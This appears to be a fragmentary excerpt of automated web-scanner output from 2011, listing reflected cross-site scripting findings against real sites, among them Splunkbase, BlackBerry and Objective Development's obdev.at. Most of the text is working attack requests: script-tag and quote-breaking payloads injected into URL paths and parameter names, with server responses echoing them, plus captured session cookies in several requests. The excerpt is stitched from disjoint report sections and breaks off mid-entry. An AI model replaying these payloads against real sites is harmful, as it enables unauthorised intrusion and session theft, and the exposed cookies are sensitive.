GET /apps/All/4.x5d256"><script>alert(1)</script>57ae3520054/ HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:02:08 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4529 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web3 ...[SNIP]... <a href="/account:login/?return_to=/apps/All/4.x5d256"><script>alert(1)</script>57ae3520054/"> ...[SNIP]...
4.169. http://splunkbase.splunk.com/apps/All/4.x/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://splunkbase.splunk.com
Path:
/apps/All/4.x/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbfd"><script>alert(1)</script>9cc5ed5b283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps/All/4.x/?8bbfd"><script>alert(1)</script>9cc5ed5b283=1 HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:34 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web1 ...[SNIP]... <a href="/account:login/?return_to=/apps/All/4.x/?8bbfd"><script>alert(1)</script>9cc5ed5b283=1"> ...[SNIP]...
The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 160b5"><script>alert(1)</script>8289440e214 was submitted in the sort parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps/All/4.x/?sort=downloads160b5"><script>alert(1)</script>8289440e214 HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:00:01 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web1 ...[SNIP]... <a href="/account:login/?return_to=/apps/All/4.x/?sort=downloads160b5"><script>alert(1)</script>8289440e214"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2bc"><script>alert(1)</script>37431b8030e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae785"><script>alert(1)</script>c27293a75ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf5e"><script>alert(1)</script>4dc15f8bb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd91"><script>alert(1)</script>613c0e86185 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5f2"><script>alert(1)</script>5b2a9f4689f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c02d"><script>alert(1)</script>545b7bade52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976f3"><script>alert(1)</script>920e718ec47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a383a"><script>alert(1)</script>3669f449178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b609f"><script>alert(1)</script>aa589454ef5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:01:55 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ssoj=1 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 4936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web2 ...[SNIP]... <a href="/account:login/?return_to=/static/js/splunkbase.jsb609f"><script>alert(1)</script>aa589454ef5"> ...[SNIP]...
4.180. http://tipd.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tipd.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6785a"><script>alert(1)</script>ea5c679a90c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6785a"><script>alert(1)</script>ea5c679a90c=1 HTTP/1.1 Host: tipd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94178"><script>alert(1)</script>d0d62204af5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /eng/devices/94178"><script>alert(1)</script>d0d62204af5 HTTP/1.1 Host: us.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 05 Feb 2011 22:39:03 GMT Date: Sat, 05 Feb 2011 22:39:03 GMT Content-Length: 22981 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7d227'><script>alert(1)</script>33ee9042bc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products7d227'><script>alert(1)</script>33ee9042bc9/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:44 GMT Vary: Accept-Encoding Content-Length: 4055 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f551b'><script>alert(1)</script>12a83f74717 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitchf551b'><script>alert(1)</script>12a83f74717/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:44 GMT Vary: Accept-Encoding Content-Length: 4055 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaa43'-alert(1)-'b0503c02c98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))<aaa43'-alert(1)-'b0503c02c98/script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 4025 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fb55'><script>alert(1)</script>ff7442838a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/8fb55'><script>alert(1)</script>ff7442838a6/script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3925 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d37b6(a)1b76ab0a2c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))<d37b6(a)1b76ab0a2c2/script>aa4542fda85 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 4007 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b5184(a)c1c1c8d7cc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</b5184(a)c1c1c8d7cc3 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:48 GMT Vary: Accept-Encoding Content-Length: 3971 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e98'-alert(1)-'64f6e4907a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</46e98'-alert(1)-'64f6e4907a0 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:48 GMT Vary: Accept-Encoding Content-Length: 3989 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d354f<script>alert(1)</script>b91a43a6580 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85d354f<script>alert(1)</script>b91a43a6580 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:49 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:49 GMT Vary: Accept-Encoding Content-Length: 4051 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fa328<script>alert(1)</script>66fb205d706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/download.html165b9'><script>alert(string.fromcharcode(88,83,83))</script>aa4542fda85?fa328<script>alert(1)</script>66fb205d706=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:43 GMT Vary: Accept-Encoding Content-Length: 4057 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17445'><script>alert(1)</script>0881d7f8c81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products17445'><script>alert(1)</script>0881d7f8c81/littlesnitch/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3913 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71a73'><script>alert(1)</script>5d20f71e910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch71a73'><script>alert(1)</script>5d20f71e910/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3913 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9134b'><script>alert(1)</script>94a64c89046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/index.html9134b'><script>alert(1)</script>94a64c89046 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:47 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:47 GMT Vary: Accept-Encoding Content-Length: 3907 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.324. http://www.obdev.at/products/littlesnitch/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.obdev.at
Path:
/products/littlesnitch/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6aa85'><script>alert(1)</script>881a3da76c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/littlesnitch/index.html?6aa85'><script>alert(1)</script>881a3da76c9=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 10370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Little Snitch</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a066'><script>alert(1)</script>128ea21a6f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products7a066'><script>alert(1)</script>128ea21a6f2/pebbles/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3903 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 692ca'><script>alert(1)</script>ac693856ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/pebbles692ca'><script>alert(1)</script>ac693856ed/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3901 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 715b6'><script>alert(1)</script>8614b924e9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/pebbles/index.html715b6'><script>alert(1)</script>8614b924e9e HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
